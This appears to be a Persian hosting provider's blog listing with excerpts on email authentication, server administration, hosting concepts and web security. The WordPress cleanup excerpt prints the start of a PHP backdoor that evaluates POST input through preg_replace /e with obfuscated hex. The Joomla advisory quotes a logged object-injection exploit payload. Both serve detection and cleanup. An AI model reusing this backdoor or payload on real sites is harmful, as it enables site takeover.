تایید ایمیل بر اساس دامین، گزارش و تطبیق ( DMARC )
تاریخچه ارسال ایمیل های کلاهبرداری به همان ابتدای بوجود آمدن ایمیل برمی گردد. متاسفانه در ساختار پروتکل های ایمیل راهی برای جلوگیری آنها وجود ندارد. در طول سال های گذشته افراد و شرکت های زیادی که در زمینه ی ارسال و دریافت ایمیل فعالیت داشتند برای ایجاد راهکارهایی برای مواجهه با این مسئله کوشیده اند. در طول دهه ی گذشته تکنولوژی هایی نظیر SPF و DKIM برای کسب اطمینان از سالم بودن محتوای ایمیلها ارائه شده اند. حتی با استفاده ی گسترده از آنها روند ایمیل های کلاه برداری و فریبنده، آنچنان کاهش نیافته است.روشن نیست که اگر ایمیلی مطابق با DKIM یا SPF نباشد حتما کلاهبرداری هست یا نه؟
راهنمای تغییر پسورد VPSهای لینوکس در Proxmox
اگر نیاز به آموزش تغییر پسورد لینوکس وی پی اس در Proxmox دارید، باید این مقاله را مطالعه کنید؛ زیرا در این مطلب به صورت گام به گام و ساده نحوه انجام این کار را برای شما بیان کردیم. صورت گام به گام و ساده نحوه انجام این کار را برای شما بیان کردیم. آموزش تغییر پسورد لینوکس وی پی اس در Proxmos قدم اول: پیداکردن درایور سرور مجازی به سرور اصلی پروکسموکس ssh کنید. با دستور lvdisplay و vgdisplay بهصورت زیر، درایوی که سرورمجازی روی آن است را پیدا کنید. vgdisplay — Volume group — VG Name vg0 System ID Format lvm2 Metadata Areas 1 Metadata Sequence No 14 VG Access read/write VG Status resizable MAX LV 0 Cur LV 2 Open LV 1 Max PV 0 Cur PV 1 Act PV 1 VG Size 698.01 GiB PE Size 4.00 MiB Total PE 178690 Alloc PE / Size 120320 / 470.00 GiB Free PE / Size 58370 / 228.01 GiB VG UUID UrjwY7-1yQC-eJpi-E27i-Pw69-pW7R-pxILVX</li> </ol> root@Server ~ # lvdisplay — Logical volume — LV Path /dev/vg0/root LV Name root VG Name vg0 LV UUID vNLHPP-i1t7-Wduc-pnLF-d8Zu-ht5Z-kymAsz LV Write Access read/write LV Creation host, time rescue, 2015-07-10 15:24:54 +0200 LV Status available […]
راهنمای استفاده از ترلو (بخش سوم، ابزارهای مدیریت پروژه)
پیش از این -در اینجا– درباره ترلو و روش عضویت در آن صحبت کردیم. در ادامه از روش استفاده ترلو صحبت خواهیم کرد. در اولین ورود به ترلو، یک Organization (ارگانیزیشن) و Board (برد) پیشفرض در فضای کاربری خود مشاهده میکنید که توسط ترلو ایجاد شدهاست. همچنین لینکهایی برای ایجاد برد و ارگانیزیشن جدید وجود دارد. ایجاد یک Organization در ترلو: ارگانیزیشن برای سازماندهی پروژهها طراحی شدهاست و میتواند شامل یک یا چند برد باشد؛ بهعنوان مثال میتوان برای هر سازمان یا پروژه یک ارگانیزیشن جدا تعریف و برای هر بخش از آن یک برد. برای شروع پیشنهاد ما ساخت یک ارگانیزیشن میباشد، برای این منظور کافی است بر روی لینک «Create a new organization» کلیک نمایید تا پنجرهای مشابه تصویر زیر باز گردد. در این پنجره کافی است نام ارگانیزیشن را وارد و بر روی کلید «Create» کلیک نمایید. درصورت تمایل میتوانید توضیحاتی در باره ارگانیزیشن نیز در بخش «Description» اضافه نمایید. پس از ایجاد به صفحه مشابه تصویر زیر هدایت خواهید شد. در این صفحه امکانات مدیریتی ارگانیزیشن در اختیار شما قرار دارد، مانند مشاهده بردهای آن در صورت وجود و تغییر نام و توضیحات ارگانیزیشن. همچنین در تبهای «Settings» و «Members» میتوانید تنظیمات بیشتری به […]
آپدیت اساسی گوگل در هسته الگوریتم های رتبه بندی
در هفته ای که گذشت گوگل یک بروزرسانی اساسی در نحوه رتبه بندی سایت ها انجام داد. آیا شما هم تغییری در این خصوص در وب سایت های خود احساس کردید؟ Gary Illyes و John Mueller در توئیتر خود تایید کردند که آنچه وبمسترها در هفته گذشته مشاهده کردند، آپدیت الگوریتم پنگوئن گوگل که انتظارش می رفت نبوده است بلکه یک تغییر نسبی در هسته الگوریتم های رتبه بندی گوگل می باشد. برخی از کارشناسان وب سایت معتبر SearchEngineLand از این رویداد به عنوان “آپدیت عظیم” نامبرده اند. گوگل به ندرت آپدیت های اصلی خود را اعلام می دارد و این در حالی است که وبمسترها منتظر آپدیت الگوریتم پنگوئن در ماه ژانویه که دچار تاخیر شده است بودند، این موضوع منجر به اشتباهات و سردرگمی های زیادی برای مدیران وب سایت ها و وبمسترها در خصوص ارتباط این آپدیت با الگوریتم پنگوئن رخ داده است. اما نشانه ها حاکی از آن است که رویداد هفته گذشته به الگوریتم پنگوئن ارتباطی ندارد و موضوع فراتر از آن می باشد. در حال حاضر تنها آنچه مشخص است، یک بروزرسانی اساسی که بیشتر به الگوریتم پاندا(ارزش بالاتر وب سایت های با کیفیت) شبیه است می باشد. گفتنی است بر خلاف بروزرسانی ها […]
خدمات میزبانی
در مفهوم کلی خدمات میزبانی به معنی سرویس هایی است که در بستر اینترنت به کاربران ارائه می شود. محیط خدمات میزبانی یک کامپیوتر پیکربندی شده است که به ازای ارائه ی برخی از منابع و امکانات خود به مشتریان هزینه ای از آن ها دریافت خواهد کرد. از اینترنت برای اتصال سرور به کلاینت استفاده می شود و دسترسی به سرور اطلاعات، محتوا و سرویس ها از طریق اینترنت ممکن خواهد بود. انواع خدمات میزبانی در حیطه ی مفاهیم وب سایت و یا وب سرویس است اما ممکن است در برخی از موارد مفاهیم آن تغییر یابد. وب هاستینگ: مجموعه ای منحصر به فرد از برنامه های نرم افزاری یا خدمات ( مانند FTP و ایمیل) و یک محیط برای کار با زبان های برنامه نویسی مختلف ( مانند PHP، دات نت و جاوا ) فراهم می کند. فایل هاستنیگ: فایل هاستینگ امکان ذخیره سازی را در برنامه های کاربردی وب و یا سایت ها ایجاد می کند. فایل هاستینگ یک سرویس امن و ایده آل برای ذخیره سازی فایل ها است همچنین میزان از دست دادن یا سرقت فایل ها کاهش می باید. میزبانی از تصاویر: میزبان سرور امکاناتی را برای کار بر روی تصاویر و فایل های […]
ارائه دهنده خدمات مدیریت شده ( Managed Service Provider (MSP) )
MSP یک نوع از خدمات شرکت IT است که سرور، شبکه و برنامه های کاربردی تخصصی را برای کاربران و سازمان ها ارائه می دهد. این برنامه های کاربردی هاستینگ و مدیریت آن را ارائه می دهند. MSP یک مدیریت خدمات ارتباطی عمومی است مانند خط های گسترده ی شبکه ی WAN است و انواع سرویس های یک شرکت را یکپارچه و مدیریت می کند، انواع این سرویس های عبارت اند از: وب هاستینگ دسترسی استاندارد به داده ها و حمل و نقل آن ها مجوز مدیریت پشتیبانی از شبکه های ویدئویی پیام رسانی یکپارچه مدیریت نیروی انسانی و مشخصات هر فرد به طور مجزا مدیریت کامل شبکه و برون سپاری آن که شامل ویژگی هایی مثل پیام، مرکز تماس، تلفن IP، فایروال، مدیریت شبکه های خصوصی مجازی (VPS) ، نظارت و تهیه گزارش از شبکه است. ارائه دهنده خدمات میزبانی وب ( Hosting Service Provider(HSP)) HSP یک نوع از ارائه دهنده خدمات IT است که منابع IT را برای افراد و وب سایت های مبتنی بر اینترنت ارائه می دهد. ارائه دهنده خدمات میزبانی وب امکانات سخت افزاری، نرم افزاری، ذخیره سازی، شبکه و یا ترکیبی از آن ها را برای مشتریان ارائه می دهند. ارائه دهندگان خدمات میزبانی […]
حذف Malware های آپلود شده از طریق shell در وردپرس
اگر شما دارای تعدادی زیادی وبسایت که با وردپرس ایجاده شده اند هستید، بارها ممکن است با این مشکل روبرو شده باشید، بطور کلی بیشتر این هکرهای عزیز به دنبال فولدر هایی می گردند که سطح درستی آنها ۷۷۷ می باشد، که در وردپرس رایج ترین مسیر /wp-content/uploads/ می باشد؛ بنابراین لازم است که به دنبال فایل های آپلود شده در این مسیر بر حسب تاریخ بگردیم، بدین منظور درshell دستور زیر را اجرا کنید : find ./public_html/wp-content/uploads/ -type f -name ‘*.php’ -printf ‘%TY-%Tm-%Td %TT %p\n’ | sort به عنوان نمونه، نتیجه بررسی به صورت زیر می باشد: ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/2013/05/blog84.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/2014/10/dump.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/2014/code.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/2015/07/session90.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/2015/09/xml96.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/2015/504.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/about_us.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/contactus.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/rtbwvcsxrnbsvcd.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/sc_afsed.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/team.php ۲۰۱۵-۱۰-۱۶ ۱۲:۲۵:۰۱ ./wp-content/uploads/wp-upload.php می توانید با دستور head خطوط اولیه این فایل ها را جهت بررسی محتوای آن مشاهده نمایید. به عنوان مثال در فایل blog84.php بدین صورت می باشد: head ./wp-content/uploads/2013/05/blog84.php <?php @preg_replace(‘/(.*)/e’, @$_POST[‘dnrdztvetxn’], ”); $GLOBALS[‘af4569’] = “\x40\x46\x33\x2e\x62\x7a\x6e\x4c\xa\x7e\x28\x39\x59\x71\x54\x5f\x73\x65\x3f\x77\x5d\x29\x6c\x2f\x79\x50\x56\x63\x5c\x4f\x3c\x70\x2d\x34\x24\x4d\x4a\x53\x57\x67\x44\x51\x23\x43\x7d\x64\x2b\x72\x5 همانطور که مشاهده می نماید این فایل ها لازم است که سریع حذف شوند. می توانید با دستور rm filename فایل مورد نظر (بعنوان مثال: blog84.php ) […]
MFT )Managed File Transfer)
MFT (مدیریت انتقال فایل) نسخه ی تکامل یافته ی تکنولوژی FTP است. زمانی که FTP برای انتقال فایل ها به اندازه کافی برای کاربران کارآمد نباشد از MFT استفاده می شود. در سطح مورد انتظار کاربران، MFT برای کنترل انتقال فایل، مدیریت و اتوماسیون فایل ها بسیار مناسب خواهد بود. به طور کلی MFT توسط سازمان هایی استفاده می شود که نیاز بیشتری به امکانات FTP یا HTTP دارند. MFT از تمام نیازهای انتقال داده پشتیبانی می کند. قابلیت های MFT امنیت: MFT سطح بالاتری از امنیت را نسبت به FTP ارائه می دهد. MFT از پروتکل های امن مانند FTPS )FTP مبتنی بر SSL و TLS) و SFTP )FTP مبتنی بر SSH) حمایت می کند. این پروتکل امنیت بیشتری تامین می کند و از رمز گذاری با هدف محافظت از اطلاعات در حمل و نقل استفاده می شود، امنیت MFT به گونه ای است که از ورود داده های جاسوسی جلوگیری می کند. مدیریت: مدیریت عملیات انتقال فایل از مهمترین قابلیت های MFT است که شامل کنترل مجوز کاربر نهایی، مدیریت ذخیره سازی فایل و انتقال آن ها، نظارت بر زمان واقعی انتقال فایل، ثبت مسیرها و … را شامل می شود. سرور MFT دید کاملی از تمام فایل […]
آسیب پذیری خط فرمان ریموت در جوملا
تیم امنیتی جوملا پس از کشف حفره امنیتی بسیار مهم خط فرمان ریموت که در تمام نسخه های جوملا از ۱.۵تا ۳.۴ وجود دارد، نسخه جدید جوملا را ارائه نمود. این یک آسیب پذیری جدی است که می تواند به راحتی مورد بهره برداری قرار گیرد و در حال حاضر بسیار خطرناک است. اگر شما از cms جوملا استفاده میکنید لازم است هم اکنون cms را بروز نمایید. اگر شما از نسخه های قدیمی (پشتیبانی نشده) ۱.۵.x و ۲.۵.x استفاده میکنید جهت برطرف سازی اساسی مشکلات از لینک زیر استفاده نمایید. https://goo.gl/Xw5Shb این آسیب پذیری از دو روز اخیر کشف شده و تکرار میکنیم در حال حاضر بسیار خطرناک است. در log زیر می توانید این آسیب پذیری را ملاحظه نمایید: ۲۰۱۵ Dec 12 16:49:07 clienyhidden.access.log Src IP: 74.3.170.33 / CAN / Alberta ۷۴.۳.۱۷۰.۳۳ – – [۱۲/Dec/2015:16:49:40 -0500] “GET /contact/ HTTP/1.1″ ۴۰۳ ۵۳۲۲ “http://google.com/” “}__test|O:21:\x22JDatabaseDriverMysqli\x22:3: .. {s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0: .. {}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:.. {s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:60:.. اگر شما از جوملا استفاده می نمایید، logهای سایت را فورا بررسی نمایید. درخواست ها از ipهای ۱۴۶.۰.۷۲.۸۳ یا ۷۴.۳.۱۷۰.۳۳ یا ۱۹۴.۲۸.۱۷۴.۱۰۶ را به عنوان اولین ipهای شروع کننده exploit بررسی نمایید. همچنین توصیه می شود در logهای سایت عبارت های JDatabaseDriverMysqli یا O: را جستجو نمایید. در صورتی […]
آشنایی با پتانسیل اینترنت در مقابله با تهدیدات امنیتی
امروزه استفاده از وب سایت و سرویس های اینترنت امری اجتناب ناپذیر در زمینه ی کسب و کار مبدل شده است. در واقع اینترنت بهترین ابزار برای جلب توجه مشتریان و تسهیل در معاملات بین سازمان ها می باشد. همچنین برای کسب و کارهایی که از طریق اینترنت انجام می شود هیچ حد و مرزی وجود ندارد. با این وجود در توسعه اینترنت، به موارد امنیتی و خطرهای استفاده از آن توجه ویژه ای شده است. اینترنت تجربه ی خوبی در رابطه با سهولت انتقال اطلاعات، به کاربران داده است، اما هکرها در کمین این اطلاعات می باشند، داده هایی که توسط کاربران وارد سایت می شوند عبارت اند از نام کاربری ورود به سیستم، رمز عبور، شماره حساب، شماره کارت اعتباری و … . هر نوع استفاده از اینترنت باید به گونه ای باشد که از وب سایت ها و اطلاعات بازدیدکنندگان حفاظت کند و تهدیدات اینترنتی را پیگیری کند. معنای امنیت سرورهای امن، سرویس دهنده هایی هستند که با استفاده از پروتکل امن در لایه سوکت از اطلاعات و درخواستهای کلاینت ها محفاظت می کند. از بین پروتکل های امن، سرویس دهنده ها و مرورگرهای وب، از پروتکلSSL بیشترین استفاده را می کنند. به طور کلی بسیاری از وب […]
هاست ASP چیست؟
هاست ASP بر روی سرور مبتنی بر ویندوز راه اندازی می شود، شما می توانید با استفاده از تکنولوژی ASP صفحات پویایی ایجاد کنید که با دسترسی به پایگاه داده امکان پیاده سازی داشته باشند. وب سایت با استفاده از سیستم عامل و وب سرور بر روی سرور اجرا می شود، سیستم عامل و وب سرور باید روی سرور نصب شوند. ASP برای کار با IIS ساخته شده است. IIS وب سرور ویندوزی و جزئی از سیستم عامل ویندوز است که وب سرور و توابع اینترنتی دیگر توسط این سیستم عامل قابل اجرا است. در حال حاضر شما می توانید برای برنامه های داینامیک از زبان ASP استفاده کنید. ASP چیست؟ ASP زبان سمت سروری است که برای ساخت وب سایت ها، کد برنامه های کاربردی مستقل، دسترسی به پایگاه داده (مانند SQL Server یا Microsoft Access database) و ترکیب صفحات HTML استفاده می شود. شما همیشه باید اطلاعات به روزی از ASP در دسترس داشته باشید، در حال حاضر نسخه جدیدی از ASP با نام ASP Classic به بازار ارائه شده است که تقریبا جانشین ASP.Net شده است. برای اولین بار ASP.Net در سال ۲۰۰۲ با نسخه ۱.۰ منتشر شد که در واقع جانشین ASP Classic گردید. مزایای استفاده […]
WHM یا مدیریت وب هاستینگ چیست؟
این مقاله راجع به نرمافزار WHM است و بدون هیچ مقدمهای سراغ اصل مطلب میرویم؛ اما قبل از آن، بگذارید خیلی کوتاه در مورد چیستی WHM بگوییم. WHM چیست؟ این عبارت مخفف Web Hosting Manager است. ناگفته نماند که تمام این وبسایتها باید از یک سرور یا هاست مشترک استفاده کنند. ویژگیای که WHM را منحصربهفرد میکند، امکان فروش فضای هاستینگ به کاربران دیگر است. شاید سروری که تهیه کردهاید، امکاناتی بیش از نیازتان را ارائه دهد. پهنای باند زیاد، فضای زیاد و …. . با استفاده از WHM میتوانید سرورتان را به هاستهای مختلف تقسیم کنید و هر هاست را به یک کاربر بفروشید. بیایید برخی دلایلی که استفاده از این ابزار را توجیه میکنند را با هم مرور کنیم. چرا از WHM استفاده کنیم؟ بالاتر هم گفتیم، WHM ابزاری است که با کمک آن، مدیریت چند وبسایت بهصورت همزمان ممکن میشود. علاوه بر آن، میتواند ابزاری باشد برای تقسیم فضای سرور هاست و فروش آن به کاربران دیگر! این کار با ساخت هاستهای جداگانه برای هر وبسایت انجام میشود. مقاله cPanel چیست را بخوانید تا بیشتر با آن آشنا شوید. مواردی که در ادامه میبینید، دلایلی هستند که استفاده از این ابزار را توجیه میکنند: اگر یکی از […]
هشدار مهم ایمیل فیشینگ توسط رجیسترارهای Dynadot, Above, Hexonet و سایرین
رجیسترارها از قبیل Dynadot, Above, Hexonet و دیگر رجیسترارهای مشهور با انتشار مطلبی در مورد ایمیل های فیشینگی که در ۲۴ ساعت گذشته ارسال شده است هشدار دادند. مطلب زیر هشداری است که رجیسترار Dynadot منتشر نموده است: ما اخیرا از یک abuse ایمیل فیشینگ آگاه شدیم که برای مشتریان ما ارسال شده است. این ایمیل های در حال ارسال از ایمیلی شبیه ایمیل اکانت abuse@dynadot.com ما می باشد. اما این ایمیل ها از سمت ما ارسال نمی شوند و لازم است چشم پوشی شوند. اگر شما یکی از این ایمیل ها را دریافت نمودید یا فکر میکنید که این ایمیل از سمت ما نمی باشد، هرگز بر روی لینک های آن ایمیل کلیک ننمایید، یا به آن پاسخ و یا به شماره موجود در آن تماس نگیرید. شما می توانید در عوض به ما از طریق ایمیل info@dynadot.com، چت آنلاین ما و یا شماره تلفن ۶۵۰-۲۶۲-۰۱۰۰ اطلاع دهید. در زیر یک نمونه از ایمیلی که در حال ارسال هستند آورده شده است: اگر شما از این نمونه ایمیل های فیشینگ دریافت نمودید، لطفا بر روی لینک های موجود در آن کلیک ننمایید. هر وقت شما یک ایمیل مخرب دریافت کردید ، همیشه ایمیل header آن را بررسی نمایید؛ شما […]
برطرف نمودن آسیب پذیری SQL injection در نسخه ۳.۴.۵ جوملا
تیم توسعه دهنده جوملا به دلیل بروز مشکل امنیتی مهمی، نسخه ۳.۴.۵ را جهت رفع این آسیب پذیری منتشر کرد. این آسیب پذیری خطرناک شامل SQL injection به ماژول com_contenthistory می باشد، که از طریق آن هکر می تواند به سایت نفوذ کرده و کنترل آن را به طور کامل بدست بگیرد. نسخه جدید به غیر از برطرف نمودن این مشکل امنیتی، هیچ تغییری دیگری نداشته است. در صورتی که شما کاربر این CMS می باشید (جوملا ۳.۲ و بالاتر) لازم است هم اکنون نسخه جوملای خود را بروز نمایید. SQL Injection یکی از معایب رایج در اپلیکیشن های وب است و در موارد بحرانی شبیه به این، به مهاجمان اجازه میدهد از طریق یک اپلیکیشن وب، به اطلاعات حساس پایگاه داده دسترسی کامل پیدا کنند. این آسیبپذیری سبب میشود کاربر غیرمجاز بتواند از راه دور و با ربودن session مدیریت؛ بهکل وبسایت در سطح مدیریت دسترسی پیدا کند. این مشکل امنیتی توسط تیم TrustWave کشف شده است. در حال حاضر به صورت تخمینی ۲.۸ میلیون وبسایت از CMS جوملا استفاده می نمایند و پس از وردپرس از محبوبیت قابل قبولی برخوردار است. در صورتی که می خواهید تشخیص دهید که سایت شما دارای این نفوذ قرار گرفته است یا […]
هاست جوملا چیست؟ چه مزایا و معایبی دارد؟
هاست جوملا سازگارترین میزبان وب برای وبسایتهای جوملا CMS و برنامههای وب نوشته شده با PHP است. از مزیتهای این هاست آن است که نیازی به دانش عمیق درباره کدنویسی ندارید و بهراحتی میتوانید از آن استفاده کنید. جوملا یکی از CMSهای منبع باز محبوب است که میلیونها کاربر وبسایت در سراسر جهان به آن اعتماد دارند. این پلتفرم در مقایسه با دروپال، پیچیدگی کمتری دارد، اما در مقایسه با وردپرس، کمی پیچیدهتر است. اگر میخواهید در پروژه خود از هاست جوملا استفاده کنید، باید مزایا و معایب آن را بدانید تا مطمئن شوید انتخاب درستی را انجام دادهاید. در ادامه با ما همراه باشید تا به شما بگویم هاست جوملا چیست؟ و چه مزایا و معایبی دارد؟ هاست جوملا چیست؟ معمولا بسیاری از افراد اطلاعات خاصی درباره هاست جوملا ندارند، به همین دلیل در همان ابتدا با این سوال مواجه میشوند که هاست جوملا چیست؟ در پاسخ به این سوال باید گفت که جوملا یکی از بهترین سیستمهای مدیریت محتوا (content Management system) و اپن سورس و رایگان است که از آن بهعنوان یکی از رقبای اصلی وردپرس یاد میکنند. هاست جوملا یک سرویس میزبانی مخصوص جوملا است و سازگاری بسیار خوبی با این سیستم مدیریت محتوا دارد. همچنین […]
پردازش ابری (Cloud Computing) چیست؟
پردازش ابری یک اصطلاح کامپیوتری است که از آن تعبیرهای متفاوتی برداشت می شود. از نظر علم کامپیوتر واژه ی ابر(Cloud) به معنی شبکه ای از منابع و نرم افزارهای پردازشی است که برای بهبود خدمات سرویس دهی با هم همکاری می کنند. اما برای درک دقیق تری از مفهوم پردازش ابری باید به وب هاستیگ اشاره کنیم، همه ی سرویس های وب هاستینگ ( ftp، mail و … ) که بر روی سرورهای مختلف خدمات خود را ارائه می دهند با توجه به قابلیت پردازش ابری این تضمین را می دهند که اگر یک برنامه و یا نرم افزاری در سروری دچار مشکل شود هیچ اختلالی در ارایه سرویس به کاربر به وجود نمی آید. شرکت های معتبری در زمینه هاستینگ و خدمات جانبی آن در ایران وجود دارد که توان تغییرات و بروز رسانی سرورهای خود را دارند و با عنوان سرور پردازش ابری شناخته شده است. ضمنا ایران سرور در نیمه دوم سال ۱۳۹۴ در حال پیاده سازی سیستم رایانش ابری حرفه ای و افزودن به خدمات خود می باشد. کاربرانی که از سرویس های پردازش ابری استفاده می کنند نیازی نیست که اطلاعاتی در مورد هسته این تکنولوژی داشته باشند و می توانند در هر مکان […]
ETAGs و Expiry Headers چیست؟
در عصر حاضر، سرعت، یکی از مهمترین فاکتورهای یک فرآیند می باشد، به عبارت دیگر در صورتی که یک فرآیند از سرعت بیشتر و پایداری بهتری نسبت به بقیه برخوردار باشد، به عنوان یک اصل و مرجع شناخته می شود و الگو پذیر می باشد. این امر در حوزه فناوری اطلاعات به خصوص در world wide web به خوبی صادق است، یکی از مهمترین و می توان گفت که بزرگترین پارامترها در رتبه دهی وبسایت، سرعت باز شدن صفحات آن می باشد. به عنوان مثال اگر سرعت بازشدن وبسایت بیش از ۱۰ ثانیه باشد، ممکن است شما از بازدید این وبسایت صرف نظر کرده و به وبسایت دیگری رجوع کنید. از اینرو بهبود و افزایش سرعت یک وبسایت نه تنها برای حفظ کاربران و بازدیدکنندگان حیاتی است، بلکه این امر می تواند در صرفه جوی مقدار زیادی از پهنای باند کمک نماید. همچنین زمان بارگذاری وب سایت، رابطه مستقیمی با پایداری سرور دارد، چه بسا زمان زیاد باعث خاموش شدن و به اصطلاح دان تایم می شود. زمانی که بحث سرعت یک وبسایت و یا وب سرور پیشرو است، ETAGS و Expiry headers دو فاکتور اصلی بشمار می آیند که نیاز به بررسی دارند. ETAGS , Expiry headers برای شناسایی […]
Exploit و XSS چیست؟ و Zero-Day Vulnerability به چه معناست؟
Exploit چیست؟ نوعی ابزار مانند کد، نرم افزار و … می باشد که از آسیب پذیری ها و حفره های امنیتی شناسایی شده در برنامه های کاربردی، سیستم عامل ها، سخت افزار و … می تواند سوء استفاده نماید. Exploit ممکن است ترکیبی از نتیجه باگ های نرم افزاری، پسوردهای ضعیف، نرم افزار آلوده بوسیله یک کامپیوتر ویروسی یا worm، نرم افزارهای patch نشده ناشی شود. بصورت اساسی Exploit ها به دو نوع شناخته شده و شناخته نشده تقسیم می شوند. Exploit های شناخته شده تاریخچه ای دارند و ما می توانیم اقداماتی را در مقابلشان انجام دهیم. Exploit های شناخته نشده ناشی از آسیب پذیری هایی که هنوز گزارش نشده اند می باشند و این موضوع یک تهدید جدی محسوب می شوند. هکرها اغلب از Exploit ها جهت آلوده کردن تعداد زیادی از سیستم ها استفاده می کنند، در سال های اخیر تهدیدهای بسیاری با استفاده از آسیب پذیری های محصولات جاوا و Adobe مشاهده شده است. این نوع سوء استفاده از سال ۲۰۱۱ گسترده تر شده و میبینیم که چطور هکرها از آسیب پذیری در جاوا و ویندوز ۲۰۰۳ استفاده کردند تا سیستم ها را آلوده کرده و از کاربرها برای ذخیره کردن اطلاعات باجگیری کنند. Exploit ها […]
فیشینگ چیست؟ هکرها با استفاده از فیشینگ چه اطلاعاتی را هدف قرار میدهند؟
ماهیگیرها، طعمه را سر قلاب میبندند و آن را داخل آب میاندازند. باقی کار آنها امیدوار بودن است! امیدواری به این که ماهی سادهلوحی گیر قلاب بیفتد! عبارت فیشینگ هم درست مانند تلفظش، اشاره به همین موضوع دارد. یکی از قدیمیترین انواع حملات سایبری که هنوز هم در سطح بسیار گستردهای اجرا میشود. خوب است بدانید تقریباً یک سوم از تمام حملاتی که در سال گذشته انجام شد، حملات فیشینگ بودند! [su_box title=”انیمیشن Rick and Morty را دیدهاید؟” style=”soft” box_color=”#c8ebec” title_color=”#000000″ radius=”4″]در یکی از قسمتهای این انیمیشن، دستهای از فضاییها میخواهند فرمول سری درست کردن یک نوع سوخت فضایی را از ذهن ریک – دانشمند دیوانه داستان – استخراج کنند. آنها برای اینکه بتوانند به هدفشان برسند، محیط زندگی ریک را شبیهسازی میکنند! هدف آنها این است که ریک به خاطر اطمینان خاطری که از محیط میگیرد، بدون دغدغه از فرمول حرف بزند و آنها پشت پرده بتوانند دستور ساخت را به دست بیاورند. حالا کاری نداریم که در نهایت موفق نمیشوند و ریک کل سیارهشان را هم نابود میکند. بحث ما این است که حملات فیشینگ هم چنین کلیتی دارند. شبیهسازی![/su_box] به احتمال خیلی زیاد میدانید که این مقاله در رابطه حملات فیشینگ است. پس با ما همراه باشید […]
بهروزرسانی Web Site Panel
با توجه به انتشار نسخه رسمی ۲.۱ کنترلپنل WebsitePanel، در ادامه روش بهروز رسانی نسخههای قبل به این نسخه را آموزش خواهیم داد. راهنمای بهروز رسانی WebsitePanel (وبسایت پنل) به آخرین نسخه: برای تهیه لیست سرورهایی که شامل این بهروز رسانی هستند کافی است به کنترلپنل کنونی خود Login و در تب Configuration لیست را مشاهده نمایید. سپس فایل ZIP آخرین نسخه وبسایت پنل را دانلود نمایید. فایل دانلود شده را از حالت ZIP خارج نمایید، این فایل باید شامل سه فایل و یک Script (اسکریپت) SQL باشد، آنها را در پوشه temp از حالت فشرده خارج کنید. قبل از هر اقدامی و ایجاد هرگونه تغییری از وبسایت پنل کنونی خود نسخه پشتیبان تهیه کنید. برای این منظور بر روی پوشه WebsitePanel در مسیر \C:\WebsitePanel کلیک راست کرده و بر روی گزینه « send to a ZIP file» کلیک نمایید. همچنین وارد SQL Server Management Studio شده و از بانک اطلاعاتی کنونی WebsitePanel نیز نسخه پشتیبان تهیه کنید. جهت گرفتن نسخه پشتبان از بانک اطلاعاتی، پس از اتصال به SQL studio بر روی بانک اطلاعاتی وبسایت پنل (نام پیشفرض آن WebsitePanel است) راست کلیک و سپس بر روی گزینه «Tasks» کلیک و نسخه پشتیبان را تهیه نمایید. جهت بهروز رسانی SQL، نسخه اسکریپت ارائه شده […]